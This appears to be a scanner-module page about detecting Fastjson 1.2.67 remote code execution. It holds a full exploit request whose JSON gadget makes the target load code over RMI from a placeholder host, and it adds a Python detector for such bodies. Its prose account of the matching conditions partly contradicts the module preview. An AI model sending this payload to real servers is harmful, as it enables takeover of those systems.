Fastjson 1.2.67 - Remote Code Execution

By kannthu

Critical
Vidoc Module
#fastjson #rce #deserialization #oast
Description

What is "Fastjson 1.2.67 - Remote Code Execution"?

The "Fastjson 1.2.67 - Remote Code Execution" module is designed to detect a vulnerability in Fastjson 1.2.67, a popular JSON library for Java. This vulnerability allows remote attackers to execute arbitrary code on the target system. The severity of this vulnerability is classified as critical, with a CVSS score of 10.

Author: zh

Impact

If successfully exploited, this vulnerability can lead to unauthorized remote code execution on the target system. Attackers can potentially gain full control over the affected system, compromising its confidentiality, integrity, and availability.

How does the module work?

The module sends a crafted HTTP POST request to the target system, exploiting the Fastjson vulnerability. The request payload includes a specially crafted JSON object that triggers the remote code execution vulnerability.

Example request:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
   "@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
   "properties":{
      "@type":"java.util.Properties",
      "UserTransaction":"rmi://<InteractionURL>/Exploit"
   }
}

The module includes matching conditions to determine if the vulnerability is present:

- The request must not use the "dns" protocol for interaction.
- The response status code must not be 200.

If both conditions are met, the module reports the vulnerability.

Reference: https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
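
As an added example (not part of the Vidoc module or the referenced repository), the following Python code inspects an inbound JSON request body for the two features of the example request above: "@type" type hints and a remote-lookup URL in a string value. The function names, the scheme list and the placeholder host are assumptions made for illustration.

```python
import json

# Assumption: URL schemes treated as remote-lookup indicators (the page's request uses rmi).
LOOKUP_SCHEMES = {"rmi", "ldap", "ldaps"}

def _walk(node, path, findings):
    """Collect every "@type" key and every lookup-scheme URL, at any nesting depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}"
            if key == "@type":
                findings.append((here, "type-hint", str(value)))
            _walk(value, here, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", findings)
    elif isinstance(node, str):
        scheme, sep, _rest = node.partition("://")
        if sep and scheme.lower() in LOOKUP_SCHEMES:
            findings.append((path, "lookup-url", node))

def scan_body(body):
    """Return (json_path, kind, value) findings for one request body."""
    try:
        doc = json.loads(body)  # decodes JSON string escapes before keys are compared
    except (ValueError, RecursionError):
        # A body that strict JSON rejects may still be accepted by a lenient
        # server-side parser, so fall back to a raw substring check.
        return [("$", "unparseable-type-hint", "")] if "@type" in body else []
    findings = []
    _walk(doc, "$", findings)
    return findings

# Constructed samples: the page's request body with a placeholder host, a key
# written with a JSON escape, and an ordinary body.
PAGE_BODY = """{
  "@type": "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
  "properties": {
    "@type": "java.util.Properties",
    "UserTransaction": "rmi://interaction.example.invalid/Exploit"
  }
}"""
ESCAPED_BODY = r'{"\u0040type": "example.Constructed"}'
BENIGN_BODY = '{"user": "alice", "site": "https://example.org/"}'

if __name__ == "__main__":
    for name, body in [("page", PAGE_BODY), ("escaped", ESCAPED_BODY), ("benign", BENIGN_BODY)]:
        print(name, scan_body(body))
```

A finding marks a request for review or blocking at a proxy or in log analysis; it does not establish that the receiving application runs an affected Fastjson version.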

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dns and
NOT status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability